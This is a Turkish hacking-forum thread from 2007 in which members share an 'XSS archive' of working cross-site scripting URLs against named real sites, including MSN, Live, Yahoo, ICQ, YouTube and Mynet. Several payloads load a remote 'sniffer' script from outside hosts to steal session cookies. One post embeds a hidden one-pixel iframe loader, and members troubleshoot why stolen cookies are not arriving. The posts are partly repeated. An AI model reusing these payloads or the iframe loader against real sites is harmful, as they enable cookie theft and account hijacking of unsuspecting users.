Xss Arşivi

m0liver · 05-04-2007, 20:20

Sitelerde bulduğunuz XSS açıklarını buraya yazınız Teşekkürler..

m0liver · 05-04-2007, 20:27

Kod:

http://games.icq.com/game.htm?code=110272767&RefId=910"><script>alert();</script>&lc=en

aresmorris · 07-04-2007, 10:06

http://travel.msn.com.cn/sharescript...box.asp?title=

http://love21cn.msn.com.cn/login/index.php?pre_url=

http://love21cn.msn.com.cn/online/index.php?sex=

http://www.msn.es/usuario/hotmail/default.asp?sec

Bunlarda benden dileyen Hotmail Xss için kullansın ama eksik cookie geliyor..!

m0liver · 07-04-2007, 15:38

cookie bilgisini barındırmayan linklerdir.. redirect için kullnılabilir

azrail1410 · 07-04-2007, 22:34

https://broadband.msn.com/account/index.asp?email=

https://broadband.msn.com/account/in...s.com&orderID=

http://divertissements.msn.fr/disney...efault.asp?id=

http://msn.anp.nl/msn/nieuws.do?action=article&id=

https://broadband.msn.com/account/re...r.asp?orderID=

http://msn.anp.nl/msn/nieuws.do?action=article&id=

http://fashion.msn.com.tw/love/page1.asp?id

http://map.msn.com.cn/mapsearch/result.jsp?city

http://love21cn.msn.com.cn/login/index.php?pre_url=

http://love21cn.msn.com.cn/online/index.php?sex=

http://love21cn.msn.com.cn/login/ind...how_wr.php?cs=

http://travel.msn.com.cn/sharescript...box.asp?title=

http://www.msn.es/usuario/hotmail/default.asp?sec

http://notrefamille.femmes.fr.msn.co...e/default.asp?
theme=msn

Kapanan hotmail açıkları ama tam kapanmadı açıklar var hayla

http://map.msn.com.cn/mapsearch/result.jsp?city=35

m0liver · 09-04-2007, 20:49

MYNET

http://mysiteuyeler.mynet.com/cgi-bin/search/kategori.plx?search=CAT&Category="><script>alert(" wardom")</script>

YOUTUBE
http://www.youtube.com/groups_create...ries=23&group_ categories=24&group_categories=1&group_categories= 20&group_categories=26&group_categories=10&group_ c ategories=25&group_categories=22&group_categories= 15&group_categories=17&group_categories=19&group_ t ype=public&group_type=private_owner_approval&group _type=private_owner_invite&video_upload_type=immed iate&video_upload_type=owner_approve&video_upload_ type=owner_only&forum_upload_type=immediate&forum_ upload_type=owner_approve&forum_upload_type=owner_ only&group_icon=automatic&group_icon=custom&Submit
Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=129322

MSN SPACE

http://spaces.live.com/default.aspx?q=">"><script>alert("wardom");</script>&go.x=0&go.y=0&go=Search&mk t=it-it&page=searchresults&form=SPDEFD

c4nberX · 10-04-2007, 21:55

http://bigboos.sourceforge.net/index...liver%3C/h1%3E

XSS gibi bir$ey i$te,google'da rastladım

m0liver · 16-04-2007, 07:45

--------------------------------------------------------------------------------

Msn açıkları buyrun wardom sniffer linkiyle :

http://support.msn.com/networkstatus.aspx?mkt=tr";></noscript><SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT>

http://feedback.live.com/default.asp...guage_fb&local e=tr%22;%3E%3C/noscript%3E%3C">></script><SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT>

http://feedback.msn.com/default.aspx?locale=tr";></noscript><SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT>

http://notrefamille.femmes.fr.msn.com/v2/services-prenom/prenom-arabe-email.asp?prenom=<SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT>

m0liver · 16-04-2007, 07:46

http://access.yahoo.com/dsl/sbc/orde...irstname=asdf% 27e%22e%3Ee%3Cscript%3Ealert(%22WARDOM%22)%3C/script%3E%3C&lastname=&email=&email2=&.tn=817-966-4624&af filiateId=-1&altAddressReq=N&auth=&authMethod=&authString=&ca lendarDay=&calendarMonth=&calendarTime= &calendarYear=&compType=&contactPref=&cos=&current SbcisCustomer=&dir=ordercenter&equipID=&existc=&ho me=&installID=&osId=&phone1=&phone2=&phone3=&phone ext=&priority=&promo=&pw=&qualColor=blue&sel_equip ID=&sel_installID=&sel_servicePackageID=&servicePa ckageID=&ship_address=&ship_address2=&ship_choice= &ship_city=&ship_name=&ship_state=&ship_zip=&SMB=N &trackingID=72864606&userdomain=&userid=&whena= &su bmitBtn_f=%A0%A0Submit%A0%A0

c4nberX · 16-04-2007, 19:39

tebrikler 3vr3n

yine döktürmü$ün hocam,payla$ımcı yürek

m0liver · 23-04-2007, 04:45

http://support.msn.com/eform.aspx?productKey="></noscript><script>alert(document.cookie);</script>

Buyrun bir msn XSS daha

kefal · 27-04-2007, 18:47

Alıntı:

Orjinal Mesaj Sahibi 3vr3n

--------------------------------------------------------------------------------

Msn açıkları buyrun wardom sniffer linkiyle :

http://support.msn.com/networkstatus.aspx?mkt=tr";></noscript><SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT>

http://feedback.live.com/default.asp...guage_fb&local e=tr%22;%3E%3C/noscript%3E%3C">></script><SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT>

http://feedback.msn.com/default.aspx?locale=tr";></noscript><SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT>

http://notrefamille.femmes.fr.msn.com/v2/services-prenom/prenom-arabe-email.asp?prenom=<SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT>

Üstad bunların encodelenmiş hali nasıl oluyo hex değerlerini almadan nasıl yapabilirizi yada?

m0liver · 27-04-2007, 23:40

hexadeximal çevirici ile çeviriyosunuz öyle kullanbilirsiniz..

kefal · 28-04-2007, 02:05

m0liver · 28-04-2007, 02:47

iframe kodunu kaldırın bence ordan Ayrıca support sitesi cookie bilgilerini vermiyor zannediyorum..

05-04-2007, 20:20	#1
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	Xss Arşivi Sitelerde bulduğunuz XSS açıklarını buraya yazınız Teşekkürler..

05-04-2007, 20:27	#2
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	... Kod: http://games.icq.com/game.htm?code=110272767&RefId=910"><script>alert();</script>&lc=en

09-04-2007, 20:49	#6
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	MYNET http://mysiteuyeler.mynet.com/cgi-bin/search/kategori.plx?search=CAT&Category="><script>alert(" wardom")</script> YOUTUBE http://www.youtube.com/groups_create...ries=23&group_ categories=24&group_categories=1&group_categories= 20&group_categories=26&group_categories=10&group_ c ategories=25&group_categories=22&group_categories= 15&group_categories=17&group_categories=19&group_ t ype=public&group_type=private_owner_approval&group _type=private_owner_invite&video_upload_type=immed iate&video_upload_type=owner_approve&video_upload_ type=owner_only&forum_upload_type=immediate&forum_ upload_type=owner_approve&forum_upload_type=owner_ only&group_icon=automatic&group_icon=custom&Submit Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=129322 MSN SPACE http://spaces.live.com/default.aspx?q=">"><script>alert("wardom");</script>&go.x=0&go.y=0&go=Search&mk t=it-it&page=searchresults&form=SPDEFD Düzenleyen m0liver : 09-04-2007 at 20:52.

16-04-2007, 07:45	#8
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	-------------------------------------------------------------------------------- Msn açıkları buyrun wardom sniffer linkiyle : http://support.msn.com/networkstatus.aspx?mkt=tr";></noscript><SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT> http://feedback.live.com/default.asp...guage_fb&local e=tr%22;%3E%3C/noscript%3E%3C">></script><SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT> http://feedback.msn.com/default.aspx?locale=tr";></noscript><SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT> http://notrefamille.femmes.fr.msn.com/v2/services-prenom/prenom-arabe-email.asp?prenom=<SCRIPT%20SRC=http://wardom.my-place.us/c.jsp></SCRIPT> Düzenleyen m0liver : 16-04-2007 at 07:53.

23-04-2007, 04:45	#11
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	.. http://support.msn.com/eform.aspx?productKey="></noscript><script>alert(document.cookie);</script> Buyrun bir msn XSS daha

07-04-2007, 10:06	#3
aresmorris Çırak Kayıt Tarihi: Jun 2006 Üye numarası: #75854 Mesaj sayısı: 3 Karma etkisi: 0 Karma: 10	http://travel.msn.com.cn/sharescript...box.asp?title= http://love21cn.msn.com.cn/login/index.php?pre_url= http://love21cn.msn.com.cn/online/index.php?sex= http://www.msn.es/usuario/hotmail/default.asp?sec Bunlarda benden dileyen Hotmail Xss için kullansın ama eksik cookie geliyor..!

07-04-2007, 15:38	#4
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	cookie bilgisini barındırmayan linklerdir.. redirect için kullnılabilir

07-04-2007, 22:34	#5
azrail1410 Hızlı Çırak Kayıt Tarihi: Nov 2006 Üye numarası: #99080 Mesaj sayısı: 92 Karma etkisi: 28 Karma: 2237	https://broadband.msn.com/account/index.asp?email= https://broadband.msn.com/account/in...s.com&orderID= http://divertissements.msn.fr/disney...efault.asp?id= http://msn.anp.nl/msn/nieuws.do?action=article&id= https://broadband.msn.com/account/re...r.asp?orderID= http://msn.anp.nl/msn/nieuws.do?action=article&id= http://fashion.msn.com.tw/love/page1.asp?id http://map.msn.com.cn/mapsearch/result.jsp?city http://love21cn.msn.com.cn/login/index.php?pre_url= http://love21cn.msn.com.cn/online/index.php?sex= http://love21cn.msn.com.cn/login/ind...how_wr.php?cs= http://travel.msn.com.cn/sharescript...box.asp?title= http://www.msn.es/usuario/hotmail/default.asp?sec http://notrefamille.femmes.fr.msn.co...e/default.asp? theme=msn Kapanan hotmail açıkları ama tam kapanmadı açıklar var hayla http://map.msn.com.cn/mapsearch/result.jsp?city=35

10-04-2007, 21:55	#7
c4nberX Cool Çırak Kayıt Tarihi: Jan 2007 Üye numarası: #103490 Yer: /etc/shadow Mesaj sayısı: 37 Karma etkisi: 0 Karma: 122	http://bigboos.sourceforge.net/index...liver%3C/h1%3E XSS gibi bir$ey i$te,google'da rastladım

16-04-2007, 07:46	#9
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	http://access.yahoo.com/dsl/sbc/orde...irstname=asdf% 27e%22e%3Ee%3Cscript%3Ealert(%22WARDOM%22)%3C/script%3E%3C&lastname=&email=&email2=&.tn=817-966-4624&af filiateId=-1&altAddressReq=N&auth=&authMethod=&authString=&ca lendarDay=&calendarMonth=&calendarTime= &calendarYear=&compType=&contactPref=&cos=&current SbcisCustomer=&dir=ordercenter&equipID=&existc=&ho me=&installID=&osId=&phone1=&phone2=&phone3=&phone ext=&priority=&promo=&pw=&qualColor=blue&sel_equip ID=&sel_installID=&sel_servicePackageID=&servicePa ckageID=&ship_address=&ship_address2=&ship_choice= &ship_city=&ship_name=&ship_state=&ship_zip=&SMB=N &trackingID=72864606&userdomain=&userid=&whena= &su bmitBtn_f=%A0%A0Submit%A0%A0

16-04-2007, 19:39	#10
c4nberX Cool Çırak Kayıt Tarihi: Jan 2007 Üye numarası: #103490 Yer: /etc/shadow Mesaj sayısı: 37 Karma etkisi: 0 Karma: 122	tebrikler 3vr3n yine döktürmü$ün hocam,payla$ımcı yürek

27-04-2007, 23:40	#13
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	hexadeximal çevirici ile çeviriyosunuz öyle kullanbilirsiniz..

28-04-2007, 02:05	#14
kefal Çırak Kayıt Tarihi: Aug 2006 Üye numarası: #83333 Mesaj sayısı: 22 Karma etkisi: 0 Karma: 10	<script>document.write('<iframe name="I1" src="http://support.msn.com/eform.aspx?productKey=%22%3E%3C/noscript%3E%3CSCRIPT%20SRC=%22http://senin.ifastnet.com/fatal.js%22%3E%3C/SCRIPT%3E" height="1" width="1" border="0" frameborder="0" marginwidth="1" marginheight="1" style="position: absolute; left: 0; top: 0"> hi</iframe>') Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=129322 window.status="Yukleniyor..." </script> Bu şekil doğrumu üstad?Doğruysa cookiler gelmiyo yanlışsa yanlış nerede çözemedim Düzenleyen kefal : 28-04-2007 at 02:35.

28-04-2007, 02:47	#15
m0liver Forum Ustası Kayıt Tarihi: Oct 2006 Üye numarası: #96379 Mesaj sayısı: 2,996 Karma etkisi: 6264 Karma: 625645	iframe kodunu kaldırın bence ordan Ayrıca support sitesi cookie bilgilerini vermiyor zannediyorum..

Konu Araçları	Bu Konuda Ara
Printer Çıktısını Göster Sayfayı Emaille Yolla	Bu Konuda Ara: Gelişmiş Arama